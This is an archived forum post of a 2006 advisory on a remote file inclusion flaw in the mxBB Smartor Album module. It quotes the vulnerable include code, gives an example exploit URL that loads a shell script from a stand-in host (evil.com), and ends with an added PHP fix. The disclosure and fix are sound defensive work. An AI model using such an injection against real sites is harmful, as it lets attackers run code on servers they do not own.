EvilOctal Information Security Team Technical Discussion Group's Archiver

pub!1c 2006-11-6 12:16

mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability

[code]
MX Smartor Album Module Remote File Include
Discovered by Paul Bakoyiannis {winsec}

-------------------------------------------------

Vulnerable Code:
   if ( $mode == 'album_cat' )
   {
      include($module_root_path . 'includes/album_cat.' . $phpEx);
   }
   (the rest of the vulnerable code removed for brevity)

Vulnerability: $module_root_path is uninitialized

Source Code: http://www.mx-system.com/index.php?page=4&action=file&file_id=19

Example Exploit: http://[site].com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=http://evil.com/shell.txt?

--------------------------------------------------


[/code]
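
The fix the advisory implies, as an added example (not part of the original post and not mxBB's own code): set `$module_root_path` from a server-side value before any include, and resolve the file against a fixed allow-list. The helper name `album_include_path()`, the allow-list contents, and the mapping of the `smartor_mode` request parameter to `$mode` are assumptions.

```php
<?php
// Added example, not mxBB code. Assumes this file sits in the module directory.

// 1. Assign the path from a server-side value before anything reads it, so a
//    request parameter (register_globals, extract()) can never supply it.
$module_root_path = __DIR__ . '/';
$phpEx = 'php';

// 2. Map the requested mode onto a fixed allow-list and confirm the resolved
//    file really lives under includes/. Hypothetical helper.
function album_include_path(string $root, string $mode, string $ext): ?string
{
    $allowed = ['album_cat'];            // only the mode shown in the advisory
    if (!in_array($mode, $allowed, true)) {
        return null;
    }
    $base = realpath($root . 'includes');
    $file = realpath($root . 'includes/' . $mode . '.' . $ext);
    // realpath() returns false for URLs and for missing files; the prefix
    // comparison rejects anything that resolves outside includes/.
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Assumption: smartor_mode (from the advisory's URL) is what populates $mode.
$mode = isset($_GET['smartor_mode']) ? (string) $_GET['smartor_mode'] : '';
$path = album_include_path($module_root_path, $mode, $phpEx);
if ($path === null) {
    http_response_code(400);
    exit('Invalid mode');
}
include $path;

// Defence in depth in php.ini (PHP 5.2+): allow_url_include = Off
```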

© 1999-2008 EvilOctal Security Team